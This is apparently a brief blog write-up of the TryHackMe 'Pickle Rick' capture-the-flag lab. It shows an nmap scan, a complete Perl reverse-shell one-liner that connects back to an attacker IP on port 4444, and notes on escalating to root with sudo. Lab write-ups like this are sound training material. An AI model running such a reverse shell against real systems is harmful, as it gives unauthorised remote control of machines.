TryHackMe-PickleRick CTF

NMAP

nmap -T4 -A -p- 10.10.208.39

Port 80

Dirbuster

perl -e 'use Socket;$i="10.8.94.60";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

First Ingredient

Second Ingredient

Third Ingredient

  1. Since we can ran any command by writing “sudo” before it so one way is to look into “ubuntu” folder and there we have a file called “.bash_history”
  1. Another method for getting the third ingredient is by accessing “root” folder.
  1. Or you can run “sudo bash” , that would make you a root user.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store